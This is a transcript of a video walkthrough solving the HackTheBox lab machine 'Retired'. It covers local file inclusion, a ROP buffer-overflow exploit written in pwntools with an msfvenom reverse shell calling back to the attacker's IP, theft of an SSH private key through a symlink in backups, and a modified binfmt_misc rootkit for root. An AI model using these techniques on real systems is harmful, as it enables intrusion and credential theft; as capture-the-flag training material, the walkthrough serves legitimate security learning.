Well, hello everyone, this is Mohammad Badruddin and today we are going to solve another machine from Hackthebox, and the machine name is retired and the difficulty level of that machine is medium. So without wasting time, let's jump to the terminal and we will start that machine from the nmap scan. So nmap space -s capital C space -s capital V, and the IP of the target machine is 10.10.11.154, and I want to save these results in default.nmap because I already ran the scan. So without wasting time, I'm just going to show you the scan result. So as you can see, there are two ports open. One is port number 22 and another one is port number 80. 22 is TCP port. State of the port is open. The service is SSH, which is default for SSH, this port number 22. And the service running on that port is OpenSSH 8.4p1, which does not seem vulnerable. But the other port, which is port number 80, default for HTTP, again the port state is open and the server running on that machine is nginx. Title of that is agency start bootstrap theme, required resource, and resource is index.php, and there is one parameter which is page, and the value of that page is default.html. And that seems very interesting to me because in this case there are much chances or probability for the file inclusion or directory traversal. So let's go. I already open up this and we will try that manually, and then I will show you a very good tool for the LFI, to check the LFI, right? So let's see, /etc/passwd, hit enter and nothing. Again, let's see, file : /etc/passwd, and yeah, that works. That means local file inclusion vulnerability is there. So view the source page, and as you can see, this is etc passwd content, where we can see there are one valid user which is dev, and the UID of this is 1001. So there should be another user, this one, which has user ID 1000 and the username is vagrant. Fine. Next is www.data. This is also interesting, but only these three users can run bash. Okay. So again, now I want to show you the tool which I was talking about. So it is GitHub LFI map. And this is the tool. I frequently use this tool because it gives you much more ability and it is very powerful in terms of its feature. And whenever you are going to manually test for the directory traversal or local file inclusion, sometimes a few things escape from your mind, but this one will not escape anything. So let's see, I already LFI map, I already cloned this repository. Although you can install this tool in your machine also, there are installation instructions, you can follow these, and all these features you have here, all these switches. So you can apply filter, input data, expect for XSS. So you can also test the reflected XSS cross-site scripting with this tool too. And it may also give you the reverse shell through LFI. Word list is already there, and you can see this is how you can execute or run this tool against the target, right? So without wasting time, let's jump here. Clear Python 3 space LFI map.py space -a to see all kind of attack or all kind of scanning space hyphen a, which is all. Use all available methods to attack. Then the URL, which is retire.htb/index.php, and page is equal to whatever parameter value you want to check. You must type pwn here. Same like fuf. If you use fuf, you used to put the parameter is fuzz, right? So here you put it, the value of this page, the value of this parameter is pwn. So that's how this tool will know that you want to test here for the vulnerability. And as you hit enter, you can see it's very fast, and it's give you the local file inclusion vulnerability exist. And this is how you can get the contents. So we tried this one, but you can also use this and maybe another wrapper for base 64 encoded. So let's go. We will try this one again. Copy that. Sorry. Copy, come back here and just paste that value here, hit enter. There is local file inclusion. So we will try to read other files like index.php. And as you can see, index.php is there. So what this file is all about, it's sanitizing input parameter. Whatever input it gets from the user means here the value of page. So parameter 1 string replace. So any string it takes, like it see like this, it is going to convert it to with nothing. So here if I try or here if I try //etc/pass/wd, so see it go back to default.html. Let's try to enumerate the files, because maybe there are other files too. Because etc/passwd, we know that it's inside the system. Also we can go for /etc/host. These all the files are there in the system. Retired. Okay, so come back here and we are going to use fuf tool. So fuf space -w user share word list and sec list discovery web contents. Inside it there is raft file, medium file, lowercase, and then we need to specify the URL, which is http:// retire.html htb/index.php, and the argument is page is equal to, and here I want to fuzz this value. Let's see, hit enter. Oh, all 200. All status code are 200, but the size is 0 and the word is 1. But here, as you can see, this entry, if there is any genuine file, so you will get size not equal to 0 and you will not get word equal to 0. So according to that, we are going to fuzz, and this time I'm gonna say filter words 1. So if the word value is equal to 1, that means it will filter that value and it will not show us that. So hit enter, and the most important entry we have here is this beta.html. So beta.html, hit enter. Everything is same here, but once you scroll down, you will see beta testing program for EMU. So currently development for EMU just started, but we have big plans. If you bought an ostrich console from us and want to be a part of the next step, you can enable your ostrich license for usage with EMU via the active_license application today for our upcoming beta testing program for EMU. So a license files contains a 512-bit key. That key is also in the QR code contained within the ostrich package. Thank you for your participating in our beta testing program and upload the license file. So from here we can upload the license file. I already tried to upload the PHP reverse shell file and other files for the web shell files, but all those files did not work. So but the information here we have is quite interesting, because as you can see, there is one application which is EMU, and that you can access with the ostrich console. So this is the first information. The second information is you have to enable your ostrich license for the usage of EMU via active_license application. So there is another application which is active_license, and to activate this license we have to upload the license file, and the file has 512-bit key. That's very good. So if we come here, let's try instead of that, because it said there is another application which is activate_license. Yeah, so license license, let's say .php. Nothing, but maybe we will get that. And yeah, there is PHP page active_license. So it's saying there is one variable. First of all, it's taking the file name is license file. Okay, variable is license, get file content, and it is going to take the file content of this file with the temporary name, and license size, here it will calculate the size, and then it is going to connect somewhere, and if the socket is not available, it will say error socket create, and then it will connect to the local host with 1337 port. Interesting. Okay, and then it is going to socket write socket and pack n license size. Okay, then it will shut down and close the socket. So from this file we know few things, like the file name is license file, and the service running on port number 1337, and it is going to pack the size with n PHP filter resource proc schedule dump, schedule debug, and go down here. Let's see all the processes. PHP FPM 7.4. And there is one active license. So I'm going to copy this, come here, paste that, and also copy this and paste it here. Fine. So this could be active license, but it's not printed here completely. So we will see it in a minute. This is the process ID. Okay. So let's see, with this process ID we can reach up to with the process. So the process ID is 398. So 398. There is exe. Oh, so this is the binary file, and what we need to do here is we can copy this binary file to our machine. So just copy this URL and come back to the terminal, clear this, and we are gonna say curl just paste that. Home, we don't need this. Okay, space -o, and then save it as activate underscore license and hit enter. Okay, so I'm going to set the execution permission on it, and let's try to execute that. Specify port to bind to. Okay, so we need to specify a port to execute it. So let's say 8080, hit enter, and yeah, now it's listening. Now let's try to connect with this application. So nc space hyphen v and 127.0.0.1 and on the port number 8080, hit enter, and it's saying accepted client connection from this. Okay, what else? Okay, one more time, once we enter, it's saying reading bytes. Now it is going to take the license file content, and the license file content, it said 512 bits. Where is it? 512 bit key. So Python 3 -c for the command, and we are going to say print into 512, or let's first try 600 A's, because that seems if there is buffer overflow, so we will get some extra content. Okay, hit enter. So there are 600 A's. Just copy these A's, and from this client, this is the client will give the content of the license file, which is 600 A's, and just hit enter. And as we hit enter, you can see here we got some extra bytes, right? Let's try to, okay, it's still connected. Just connect one more time, enter, and hit enter one more time so that it start reading. And now just type few A's, maybe 10, hit enter, and as you can see, it activated license, and this is the license content, and there is nothing. Okay, but once you put 600 A's, it read it, and then it leaks some information. Okay, so we can control it, but not like Stack Overflow, the normal buffer overflow. So let's try. On 600, it gives us, it leaks some information. Now because it's saying the license file contains 512 bit key, so we are going to exactly print 512 A's, and I'm going to copy this, connect again to the application, and enter one more time, so it start reading, and then just paste 512 A's and hit enter. And yeah, and if I try 510 byte 10 A's, copy this value, clear here again, sorry, and connect again, hit enter one more time, and just paste these 510 A's, right? And as you can see, there is no leak of information. If I try 511, hit enter, copy this, and connect again, hit enter, start reading, paste 511 A's, hit enter. So even on 511, it leaks information, but because it's saying 512, so we consider with 512. and this 512 is going to be the offset value. So from here we can get few things like PID is equal to 398 and the offset is equal to 512. Because 512 are the exact bytes, so let's consider it increase 8 bits more, 520, and try to connect again, enter, and just paste 520 A's, hit enter, and there is a difference. The difference here, as you can see, in the value leaked. So let's just increase the 8-bit. So offset we can consider is 512 plus 8, so equal to 520. Although if I try, let's say 800, hit enter, fine, and we can connect again, start reading bytes. Now copy these 800 A's and just paste it here, hit enter, and you can see on 800 it is not leaking any information. So up to 600 I think is okay, but we need to go as closer as you can. So 520 is okay. So this is going to be the offset. Then clear this and clear this and clear. What libraries, same like in Windows, when any execution file executed, it needs some DLL files. Similarly here, I want to check which kind of libraries it required, if there is any library or not. So LDD and activate license, and as you can see it needs these libraries, which is library SQLite 3.so.0 and lib.so.6 and libpthread and libdl. Okay, and these are the addresses. Fine. So but these libraries, it is taking these libraries from the attacker machine system, but on the target system what libraries it takes we need to see, and we can see that here, like /maps, hit enter, and yeah, there you go, and all these all these libraries are here. But there are few more good information, like the heap and its address, stack and its address. We can write the exploit according to our system, but eventually in the last you have to write it according to the target system, because on target system, if you see, the library version is totally different. libsqlite 3 so086, libsqlite 3, this one is SQLite 3.so.0 and this is 8.6. If you see the library libc, it is 2.31.so, but here if you see, the version is libc.so.6 only. Fine. So okay, we are going to take few things. First thing is stack. So this is the starting value of the stack, starting address, and this is the end address. So we need these two. I'm going to copy this, come here, here, and just paste that. Stack starts equal to from here, and stack ends from here. Okay. One more thing which is important to know, these are the permissions. So there are actually three permissions: read, write, and execution. If this is non-shared, so you will get P. P means private. So this is non-shared, right? We need this library, and this library starts with this address. So I'm going to copy this, come here, and here we can say paste that, and this is going to be libsqlite, or just say libsql. Copy, come here, paste underscore address. So this is the address, and libsql path is equal to, this is the path. So copy, come back here, paste that. Next thing, we need libc. So it starts from here. So this is the starting address, libc underscore address, this, and libc underscore path is going to be this one. Okay, so copy that, paste it here. Okay, that's perfect. Now what I need to do here, all these parameters will be required to create the exploit. Okay, so we get the parameters, I think everything what I need. So let's go and we will create the exploit. But before creating the exploit, I also need these libraries to my PC, to attacker PC, and for that we have to download all these, not all these, especially these two libraries to my machine. So take this, we have the path, come back here, and we can run the curl command. Paste that, and let's see it like this. So copy and paste that here, hit enter. It's downloaded. Now we need to download the other one. This one is gonna be libc. So this is the first. Actually, we just need this. Copy, come here, because the rest of the path we already written here. So, and save it like this. Fine. Now if I try here listing the file, so we have both of these libraries with us, right? Okay, that's it. Let's go and we will start creating our exploit. So we will create it on the Python. User bin env python 3, and let's import the modules. We need request and socket, right? And we also need from pwn. I'm going to use the pawn library here, socket from pawn, import all, right? Now def ROPBOF. It needs nothing. So what we have here, the first thing is we will put the shell code. Okay, and we will do it in a minute. Then first of all we need PID. So process ID we already have, which is 398, right? 398. Yeah, PID is 398. Okay, then we need stack underscore starts, which is equal to this, but we need it in integer because it will be easy to calculate in integer. So we need to convert this value into the integer. And how we will do this? We will do this with Python. So Python 3 space -c, and we need to print, what? Copy this value, stack starts, and paste it here, and 16, because it is from 0 to F, right? Hexadecimal, and we need to convert it into the integer. So int, and just enclose this, hit enter, and this is the integer value of stack starts. So come here, and we will put the integer value. Then stack underscore ends, which is going to be again we just need to come here and take the value of stack ends, copy, come back here, paste the value, and hit enter. This is the value for stack ends. So come back here and just paste this value. This is integer. Now next thing, we need values for this. So address, copy, come back here, change this address again to integer, paste that, hit enter, and this is the integer value. So copy and come back here, libsql underscore add is equal to this. Now libsql underscore path, which is gonna be same like this one. So just copy this and paste it here. Now we need libc underscore addr, means address or add just, and we again need to convert it. So copy, go back and just paste that, hit enter, and this is the integer value. Now we need this libc path, so copy and paste it here. One more thing which you need to keep in mind, that these values I'm going to take from my PC. So it is gonna be in /root/desktop /htb/retired. Fine. And again this one also, copy and paste that here. Save it, and we are going to save it as ROP underscore BOF.py. Okay, fine. Now One more thing I want to check first. Clear file active license. So it is ELF 64-bit LSB Pi executable. Okay, with debug info, not stripped. That's correct. So come back here. Stack starts, stack end. Let's stack size. So the stack size is going to be the stack ends value minus stack starts value. So just copy this here, space minus and stack start. So paste that. Fine, we got that. Now because these files file libc, these are the ELF files, so we need to here mention that these are the ELF files. ELF, and here also ELF. Okay, now we need to calculate the ROP. So ROP, and so we need this path, paste, comma, this path. We need to tell the path for the libraries. Okay, fine. So everything seems okay. Now we have offset is equal to 520. Now let's try to see the addresses for these libraries. So for that we have one program which is read ELF. So read ELF plus space -h. It is actually for the ELF file, to read the ELF files and its functions and all. Read ELF space -s, and the file name is libc. Come on, libc, and hit enter. And as you can see, it is going to give you the address and whether it is function or object, and this function is weak or global, everything it gives you. But there are thousands of functions which you cannot analyze one by one. Fine. So we need some prior knowledge for this, and I am going to actually check if mprotect function is there or not, and the strength of that function must be weak. So let's go clear, and I'm gonna grep mprotect. So yeah, mprotect function is there, this is function, and weak, this is default. Fine, so we can use this mprotect here. So mprotect is equal to libc dot symbols, and it is going to be mprotect. So what actually I am telling, to use the symbol from libc, and the symbol it should see is mprotect. Fine. And one more interesting thing is this is the value, address value of this function. Fine. So we can copy this with us, copy, and come here, paste that here. So this is the function. Okay. Now the next part is we need to now calculate the ROP. So for this there is another binary which is ROPper. So this is the binary ROPper, or as you can see there are ROP gadgets also. So space -h. This is used for return-oriented programming exploits. Okay, these are the switches, binary opcode string offsets. Let you search your gadgets on a binary. It supports several files format, ELF files. So this is for the binary. This is the ROP chain. Okay, let's copy this one, come back here, paste that, but instead of this I'm gonna say activate licenses, command not found. Okay, because it's not .py. So ROP chain generation, the step 1 is write what where gadget, can't find MOV. Okay. And that's what we are going to try with our Python script. So clear this and where it goes, paste that. ROP chain should be libc and it's not pi. And this is too much, so I'm gonna cancel it. I just wanted to show you in the last we are going to calculate everything with the pawn module which we imported in our Python script, and with the pawn module we can calculate all these gadgets, but my intention is to show you how you can manually take that approach. And because you know that this is the ROP overflow, so in that you can use one more tool which is ROPper, and you just need to specify the file. So the file is libc. Okay, and you need to search, let's say pop RDI. Okay, so we need RDI, RSI and RDX. And if you see here, it first loads this library, then go to SQLite. Fine. So we will go with this sequence. So RDI and RSI we will find in this library, then we will go to see the jump in the libsql. Okay, so this is the result for RDI. As you can see, POP RDI everywhere, and these are the difference function. Here it's adding and it's calling the RAX value, then compare the value, add the byte in the RAX, subtracting, and we need this return function. So this return function address is actually we need. So copy that and come back here and we can paste it. This is return and this is POP RDI. Similarly, we can go for RSI. Okay, in the same library we search for RSI, and here you will again find the return function, and we need the return address. And yeah, here you go. So this is the return address. I'm gonna copy this and paste it here. Return pop RSI. Fine. So these are the address we need, and all these we are doing actually from here. So POP underscore RDI. Okay, and it is going to be ROP. This is the function of pawn module in the pawn module. So ROP dot RDI 0. Then I'm gonna say POP underscore RSI, and this is going to be ROP dot RSI 0, and then POP underscore RDX we need. This is again ROP dot RDX, and it's gonna be 0. So it's automatically take all those values which here we are doing manually, but make sure if you are going to do it manually, you must change this value to the integer because that needs integer value. JMP underscore RSP, and then ROP dot JSP underscore JMP underscore RSP. Fine, and that's again gonna take the first one. Fine, that seems okay. All the ROPs gadget. Now what we need here is, let's make the payload. So payload is equal to, we are going to say it in bytes and capital A into offset. So we have offset value 520, so it will multiply A in 520 times, and it takes the A as bytes, sorry, not binary, this one is for bytes. So next thing is payload and add it in this, and it is going to convert it P64, then pop underscore RDI plus P64 stack underscore starts. Fine. Now let's say payload plus equal to P64 and POP underscore RSI, and here it will add again P64 stack underscore size, which we calculated here, stack size. So we put this value here, and then payload again, p64, and this time pop underscore rdx. Fine. And this is gonna be interesting. p64, this time we are going to add here the permission. So permission is 7, which means read, write and execution, all the permissions we have, right? And last but not least, payload plus equal p64, and here we will put the jump, so jmp underscore rsp. Okay. Okay. Before jump, actually, before going to jump, payload plus equal to, because we need to tell about this mprotect function. So p64, it will also take the address for mprotect, right? p64 mprotect, and then jump, and at last it's gonna take payload plus equal to our shell code. That's it. Then once the shell code is done, then we need to upload the file. What was that? Activate underscore license.php. We need to send the request. So let's say URL is gonna be http://retired retired/activate underscore license.php, because we need to upload the file on this. Why? Because if I try something like .jpg, and just wait a moment, inspection is on. Okay, so once you submit, you will see retired.htb, and it is uploading the file on this file, activate underscore license.php. And if you come here, you will see host origin, this is the post request, and this is the file name. Fine. Now come back here, this is the URL. Then we need, because we need to upload the file, so files is gonna be license file. This is the file name. So copy this, paste that here, and the license file, in the license file we are going to send the license key, and as license key I am going to send this payload. Okay, so payload, and that's it. We just need to now send the request. So r is equal to request dot post. Fine. And URL is equal to URL, comma files equal to files. That's it. Save it, and we will try to now generate the shell code. So the shell code we will generate, let's see, we will use msf venom space -p for payload, and the payload I am going to use is linux /x64 / shell underscore reverse underscore tcp, and lhost is equal to my IP, which is 10.10.14.9, Let's test first. What is my IP? ifconfig tunnel 0, yeah, 14.9, and L port is going to be let's say 9090, and the format of this payload should be py, means Python. Hit enter. So just copy this payload, copy this, come back here, and instead of shellcode, just paste that, and fine. Now we just need to, because we use here shellcode, so just change it to shellcode, copy, paste, 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 save. That seems perfect. Now what we need to do here is clear nc space hyphen nlvp on port number 9090, and come here, clear this, and here we need to execute python 3 rop underscore bof.py, start the listener and run this. So it's saying payload is not defined. Why so? The problem is it's saying name error, payload is not defined, because here we did a blunder. It should be like this. Save it now and just try to execute that script again, and this time hopefully, function object is not subscriptable. Okay, let's see what's that error. Here it's saying function object is not subscriptable, and which is JMP RSP. So the problem is we need to tell them from here, let's say context dot clear, and we need to actually define the architecture type. Arc is equal to AMD 64. Fine, save it and let's try again. Clear, because as you can see the architecture of these libraries are 64-bit, and here we did not define that before, so maybe this is the problem, and that's why it's not calculating this RSP jump. So clear it and hope for the best, run it again. Now it's saying name offset is not defined, of course, because we write it here in lowercase and here we type it in uppercase. Paste that and clear again, run it again. Let's see how many mistakes we have done. This time seems working, but still we did not get the reverse shell. IP, who am I, and didn't work. Which command we execute? This one, MSF Venom, localhost, we provided this, okay, and local port is equal to 9090 in the py. Linux x64 shell underscore reverse underscore TCP. That's perfect. That means there is no problem in our reverse shell code. So what could be the problem? As you can see here, it's checking the binaries whether the PIE is enabled or not, Fortify is enabled or not. It's checking the library. So what we can do, canary is also found. We can do one more thing, which is super easy, and we can say checksec is equal to false. False. So now it will not check all these checkpoints. So checksec is equal to false. Save it, come back here and clear that again, hit enter. Still okay, first of all, this is the problem. Control X, and we must put it before that. Paste that here, and this one also Control X and paste it here. So we must first specify the path of that library, and then we will put the address from where it starts. So save it and let's go and run this again, and it should actually that should be .address address, and that should be address. Save it and let's go execute it again. libsql.address. libsql is not defined, so we need to change it. To this, and change this to this. Here also we can save it, run it again, clear, and hit enter. mprotect, yeah, of course, because here it is. Save it, clear, and run this. And this time we got the shell. So who am I? www data. So python 3 space hyphen c, and import the module, which is pty.spawn and bin/bash. Okay, and then export term is equal to xterm to clear the screen. Now it will support. Okay, so now let's enumerate more. Net state space hyphen tlpn and 1337, this one for the active underscore license binary. ls space hyphen la, what is inside this directory? So there are some zip files, and with those zip files, this is HTML. So ls space hyphen la HTML. Let's see what's inside HTML. So this is the web directory where all the application files are there, but that seems a bit interesting because the owner of this is dev and group is www data, and we have only read permission. Fine. And what's inside the zip file is, this is html.zip, and it's created on 12th of the August on this time, these zip files. That means maybe this dev user is taking the backup to this zip file. If we go to the HTML directory, and here if we create a symlink space -s and we say /home/dev/.ssh/id_rsa to test link and hit enter, ls space -la, it should have the link file. Yeah, it links. So go back here, ls space -la again, and you can see these files are created just now, and this is the last file because it's created on 3:30. This is 3:29. So that means once we create this link file, my purpose is to put the content of this id_rsa file to this test link file, and once this dev user make the zip file for this HTML directory, it will paste its id_rsa key into the test link. Now we need to copy this last file, this one, and then just send it to dev shm cd/dev/shm ls space -la, and this is the file. Now we need to unzip it, so unzip, and this is the file name, paste selection, hit enter, all these files are there. So the where directory is here. Now cd where ls www is there, so cd www, ls, and html is also there, so cd html. And now if we make ls space -la, so we should have test link file here. No, not there. ls space -la /where www/html. Oh, inside www is this. There is another file, and first we need to test it /where www/html if the link is there or not. So it's deleted from here. We need to create it again. So ln space -s home dev.ssh/id_rsa to /where/www/html. Inside html, let's say test. It's created, and now ls space -la /where www, it should create other zip file, and it's created on 3:30. Let's copy these files. cd ls, and let's delete where, which we created before, rm space -rf and where. Okay, anything should be deleted. Okay, now nothing is there. Just copy these files. So copy /where www slash paste that to here, and unzip this file, hit enter. Here it has the test file. It seems like it's created this time. Where cd www/html, ls space hyphen la. Come on, yeah, test is there this time. So cat test, and we have now this id rsa key for the dev user. So I'm gonna copy this, come here, nano id underscore rsa, and just paste that key, save it, and let's try to ssh. Before that we must 600 permissions, id underscore rsa, clear ssh space hyphen I, id rsa, and then the username is dev at 10.10.11.154. And yeah, it's login. That's perfect. Now what we need to do here, we don't need this, clear, and ssh space hyphen I, id rsa, dev at 10.10.11.154, hit enter, closed by y, exit from here. Yeah, so let's try ls space hyphen la. So we have the first flag here, and in the home directory of dev user there is emu. So let's see what's inside emu, because in the beta.html they said something about emu, that currently development for emu just started. So there is another application emu, and you can work on it with ostrich console, upcoming beta testing program for emu. Okay, so this is something interesting. So this is the emu executable file, and this is the C file. This is the code file, and this is the compiled file. So let's see what is emu.c. This is the C file. Currently this is only a dummy file. It is only a dummy file. Okay, and there is reg helper, which is registry helper, and again this is the compiled file, and this is the code file, source code file. So reg.c, and same character is 512. Okay, and int fd, it's opening this. So in the process says fs, there is bin fmt mig, and inside there is register. This seems interesting. Clear that and just say cd, go here. Not a directory. Yeah, register is not a directory. Directory is bin fmt misc, and there we again have emu. This is executable. So let's see, emu. So enabled interpreter is user bin emu. Fine. Let's see what's inside this. Cat user bin emu, and of course this is the binary file. ls space hyphen la, come on, clear, ls space hyphen la slash user bin emu. This binary is executed as root. Fine. So we need to see, come here, let's try to search now. Bin fmt underscore misc exploits. and there is one on the GitHub. So this is kernel support for miscellaneous. Come here. Okay, so kernel support for miscellaneous, your favorite exploit, no breakthrough here, just some trivia involving binary formats. It's a rootkit for the escalating your privileges. Okay, and we need to clone the repository and we just need to run this. The important part is this exploit will give you the root shell if this path, this file register is writable. Okay, so we don't think this is the writable file. ls space -la register, and this, as you can see, only root have the permission. We don't have any permission on this register. So, but we can do a few things. Clear this, and let's first clone this. Git clone and clone this repo. Paste it here. Hit enter. Okay. cd bin. Okay. ls space -la. And this is the rootkit file. So let's first analyze what's going on in this file. Clear. Cat bin fmt rootkit. Okay. So it's saying we must have the writable permission on this register file, which we don't have, and there is one function which is not writable. Okay, mount point / register, and it's gonna set the permission. This is another function which picks the SUID and then read the magic. Open it with the mousepad, it's better. Where is it? With mousepad. Okay. So because we don't have the write permission on the register, so let's just disable this function. And if you come to the bottom, you will see here echo bin fmt _line, and in mount point it's saying register. Because we don't have the write permission, so we cannot write it, right? So just disable this one, and or we can change it here. Instead of writing into register, we can write somewhere else where we have the write permission. So let's write it in the temp directory, and we will say test.txt, right? And then we are going to open this file, cat it should be here /temp, yeah. So /temp /test.txt, and we need to send its content to user bin /emu not in the bin, it's library, which is ls space -la /user lib user lib emu here inside that. So user lib emu, and inside emu we are going to send it to the register helper. That's it, and then it is going to execute it. Fine. So save that and just go back here and send this file to the target machine. cd/dev/shm, hit enter, clear, and let's see, python 3 space -m http dot server, port number 80, hit enter, come here, wget http:// this is my IP slash bin fmt underscore rootkit. Okay, chmod plus x bin fmt rootkit, and just enter, and we got the root shell. So id, who am I? So I'm root. Let's go cd/root ls space -la, and we have the root flag here. So that's it for this video. If you like the content, like, subscribe and share. See you in the next video. Bye.